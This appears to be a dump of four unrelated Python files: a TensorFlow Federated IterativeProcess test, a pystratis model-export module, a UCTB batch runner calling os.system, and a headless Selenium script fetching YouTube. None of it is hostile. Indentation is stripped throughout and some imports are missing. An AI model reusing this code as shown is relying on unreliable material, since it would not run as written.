from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.api import test_case
from tensorflow_federated.python.core.impl.federated_context import intrinsics
from tensorflow_federated.python.core.impl.types import computation_types
from tensorflow_federated.python.core.impl.types import placements
from tensorflow_federated.python.core.impl.types import type_conversions
from tensorflow_federated.python.core.templates import errors
from tensorflow_federated.python.core.templates import iterative_process
# Convenience aliases.
FederatedType = computation_types.FederatedType
StructType = computation_types.StructType
StructWithPythonType = computation_types.StructWithPythonType
TensorType = computation_types.TensorType
@computations.tf_computation()
def test_initialize_fn():
return tf.constant(0, tf.int32)
@computations.tf_computation(tf.int32)
def test_next_fn(state):
return state
class IterativeProcessTest(test_case.TestCase):
def test_construction_does_not_raise(self):
try:
iterative_process.IterativeProcess(test_initialize_fn, test_next_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct a valid IterativeProcess.')
def test_construction_with_empty_state_does_not_raise(self):
initialize_fn = computations.tf_computation()(lambda: ())
next_fn = computations.tf_computation(())(lambda x: (x, 1.0))
try:
iterative_process.IterativeProcess(initialize_fn, next_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct an IterativeProcess with empty state.')
def test_construction_with_unknown_dimension_does_not_raise(self):
initialize_fn = computations.tf_computation()(
lambda: tf.constant([], dtype=tf.string))
@computations.tf_computation(TensorType(shape=[None], dtype=tf.string))
def next_fn(strings):
return tf.concat([strings, tf.constant(['abc'])], axis=0)
try:
iterative_process.IterativeProcess(initialize_fn, next_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct an IterativeProcess with parameter types '
'with statically unknown shape.')
def test_init_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
iterative_process.IterativeProcess(
initialize_fn=lambda: 0, next_fn=test_next_fn)
def test_next_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
iterative_process.IterativeProcess(
initialize_fn=test_initialize_fn, next_fn=lambda state: state)
def test_init_param_not_empty_raises(self):
one_arg_initialize_fn = computations.tf_computation(tf.int32)(lambda x: x)
with self.assertRaises(errors.TemplateInitFnParamNotEmptyError):
iterative_process.IterativeProcess(one_arg_initialize_fn, test_next_fn)
def test_init_state_not_assignable(self):
float_initialize_fn = computations.tf_computation()(lambda: 0.0)
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(float_initialize_fn, test_next_fn)
def test_federated_init_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
FederatedType(tf.int32, placements.CLIENTS))(lambda state: state)
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(initialize_fn, next_fn)
def test_next_state_not_assignable(self):
float_next_fn = computations.tf_computation(
tf.float32)(lambda state: tf.cast(state, tf.float32))
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(test_initialize_fn, float_next_fn)
def test_federated_next_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(
intrinsics.federated_broadcast)
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(initialize_fn, next_fn)
def test_next_state_not_assignable_tuple_result(self):
float_next_fn = computations.tf_computation(
tf.float32,
tf.float32)(lambda state, x: (tf.cast(state, tf.float32), x))
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(test_initialize_fn, float_next_fn)
def create_test_process(
type_spec: computation_types.Type) -> iterative_process.IterativeProcess:
@computations.tf_computation
def create_value():
return type_conversions.structure_from_tensor_type_tree(
lambda t: tf.zeros(dtype=t.dtype, shape=t.shape),
type_spec.member if type_spec.is_federated() else type_spec)
@computations.federated_computation
def init_fn():
if type_spec.is_federated():
return intrinsics.federated_eval(create_value, type_spec.placement)
else:
return create_value()
@computations.federated_computation(init_fn.type_signature.result, tf.int32)
def next_fn(state, arg):
return state, arg
return iterative_process.IterativeProcess(init_fn, next_fn)
class HasEmptyStateTest(parameterized.TestCase, test_case.TestCase):
@parameterized.named_parameters(
('simple', StructType([])),
('simple_with_python_container', StructWithPythonType([], list)),
('nested', StructType([StructType([]),
StructType([StructType([])])])),
('federated_simple', computation_types.at_server(StructType([]))),
('federated_nested',
computation_types.at_server(
StructType([StructType([]),
StructType([StructType([])])]))),
)
def test_stateless_process_is_false(self, state_type):
process = create_test_process(state_type)
self.assertFalse(iterative_process.is_stateful(process))
@parameterized.named_parameters(
('tensor', TensorType(tf.int32)),
('struct_with_tensor', StructType([TensorType(tf.int32)])),
('struct_with_python_tensor',
StructWithPythonType([TensorType(tf.int32)], list)),
('nested_state',
StructType(
[StructType([]),
StructType([StructType([TensorType(tf.int32)])])])),
('federated_simple_state',
computation_types.at_server(StructType([TensorType(tf.int32)]))),
('federated_nested_state',
computation_types.at_server(
StructType([
StructType([TensorType(tf.int32)]),
StructType([StructType([])])
]))),
)
def test_stateful_process_is_true(self, state_type):
process = create_test_process(state_type)
self.assertTrue(iterative_process.is_stateful(process))
if __name__ == '__main__':
test_case.main()
|
from .getutxomodel import GetUTXOModel
from .utxomodel import UTXOModel
from pystratis.api.blockstore.responsemodels import AddressIndexerTipModel
from pystratis.api.node.responsemodels import BlockHeaderModel, ValidateAddressModel
from pystratis.api.global_responsemodels import TransactionModel, TransactionOutputModel, \
WalletSendTransactionModel, BlockTransactionDetailsModel, BlockModel
from pystratis.api.smartcontracts.responsemodels import ReceiptModel, LocalExecutionResultModel
__all__ = [
'GetUTXOModel', 'BlockTransactionDetailsModel', 'BlockModel', 'BlockHeaderModel', 'TransactionModel',
'TransactionOutputModel', 'WalletSendTransactionModel', 'ValidateAddressModel', 'AddressIndexerTipModel',
'ReceiptModel', 'LocalExecutionResultModel', 'UTXOModel'
]
|
import os
from UCTB.utils import multiple_process
def task_func(share_queue, locker, data, parameters):
print('Child process %s with pid %s' % (parameters[0], os.getpid()))
for task in data:
print('Child process', parameters[0], 'running', task)
exec_str = 'python HMM.py --Dataset %s --City %s ' % (task[0], task[1])
if task[2] != '':
exec_str += task[2]
os.system(exec_str)
locker.acquire()
share_queue.put(None)
locker.release()
if __name__ == '__main__':
task_list = [
['Bike', 'NYC', ''],
['Bike', 'Chicago', ''],
['Bike', 'DC', ''],
['Metro', 'Chongqing', ''],
['Metro', 'Shanghai', ''],
['DiDi', 'Chengdu', ''],
['DiDi', 'Xian', ''],
['ChargeStation', 'Beijing', '']
]
n_jobs = 2
multiple_process(distribute_list=task_list,
partition_func=lambda data, i, n_job: [data[e] for e in range(len(data)) if e % n_job == i],
task_func=task_func, n_jobs=n_jobs,
reduce_func=lambda x, y: None, parameters=[])
|
import os
from selenium import webdriver
op = webdriver.ChromeOptions()
op.binary_location = os.environ.get("GOOGLE_CHROME_BIN")
op.add_argument("--headless")
op.add_argument("--no-sandbox")
op.add_argument("--disable-dev-sh-usage")
driver = webdriver.Chrome(executable_path = os.environ.get("CHROMEDRIVER_PATH"), chrome_options = op)
driver.get("https://youtube.com")
print(driver.page_source)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.